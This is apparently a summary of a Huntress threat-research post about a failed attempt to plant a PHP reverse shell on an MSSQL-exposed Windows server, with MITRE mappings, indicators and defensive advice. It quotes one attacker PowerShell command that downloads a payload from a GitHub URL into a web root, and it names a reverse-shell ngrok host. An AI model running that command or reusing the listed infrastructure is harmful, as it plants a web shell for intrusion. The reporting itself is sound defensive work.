Threat Research

Managing Attack Surface | Huntress

Huntress

Two-day activity on a Windows Server MSSQL-enabled endpoint shows a threat actor attempting to upload a reverse shell to a web server, using PowerShell, certutil, and publicly available PHP reverse shell code. Windows Defender repeatedly detected and quarantined the malicious files as the actor tried multiple delivery methods and server-side script downloads. #VirToolPHPMeterpreter #hightidAOaa

Keypoints

  • The targeted endpoint was a Windows Server 2019 Essentials system monitored by Huntress, with this incident the first alert on that host after more than a year of monitoring.
  • The attacker attempted to use MSSQL sa credentials to upload a reverse shell to the web server, indicating abuse of a default account in the environment.
  • VirTool:PHP/Meterpreter.A!MTB was detected by Windows Defender on maa.php, signaling the use of PHP-based reverse shell payloads.
  • certutil.exe was used to decode a file on the endpoint, highlighting LOLBin usage to stage or decode payloads.
  • PowerShell commands were run via sqlservr.exe, including Invoke-WebRequest calls to fetch maa.php and fata.php from GitHub locations.
  • Day 1 saw a 404 GET for maa.php from 41.102.167.182 and successful sqlmap queries from 35.195.172.146, indicating probing and attempted exploitation that ultimately failed.
  • Day 2 repeated PowerShell/CERTUTIL activity, attempted another download (fata.php), and culminated in attempts to create a reverse shell via a tunneled host (0.tcp.eu.ngrok.io), though no successful shell was uploaded.
  • The conclusion emphasizes basic IT hygiene: asset inventory and attack surface reduction, including removing unneeded services like MSSQL exposure or ensuring they’re properly secured and patched.

MITRE Techniques

  • [T1078.001] Default Accounts – The threat actor attempted to use their access to the MSSQL ‘sa’ account in an attempt to upload a reverse shell to the web server. “the threat actor attempted to use their access to the MSSQL ‘sa’ account in an attempt to upload a reverse shell to the web server.”
  • [T1059.001] PowerShell – Execution of PowerShell scripts/commands via sqlservr.exe. “powershell -command Invoke-WebRequest -Uri ‘https[:]//raw.githubusercontent[.]com/hightidAOaa/azdaz/main/maa.php’ -OutFile ‘E:/inetpub/wwwroot/<REDACTED>/maa.php’ “
  • [T1059.003] Windows Command Shell – Use of command execution context related to xp_cmdshell activity (stored procedure enablement/usage). “access to the xp_cmdshell stored procedure was blocked” and “xp_cmdshell stored procedure configuration was changed from ‘0’ to ‘1’, enabling the stored procedure.”

Indicators of Compromise

  • [IP Address] 41.102.167.182 – GET request for maa.php (day 1)
  • [IP Address] 35.195.172.146 – sqlmap queries (day 1)
  • [URL] https://raw.githubusercontent.com/hightidAOaa/azdaz/main/maa.php – download source used to fetch maa.php
  • [URL] https://raw.githubusercontent.com/hightidAOaa/azdaz/raw/main/fata.php – download source used to fetch fata.php
  • [Domain] 0.tcp.eu.ngrok.io – host used for reverse shells
  • [File] maa.php – web server file involved in the attempted reverse shell
  • [File] fata.php – web server file involved in the attempted reverse shell
  • [File] tmpfrckk.txt – decoded by certutil and passed into a new executable
  • [File] tmpseevcw.exe – resulting executable from decoding tmpfrckk.txt

Read more: https://huntress.com/blog/managing-attack-surface

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint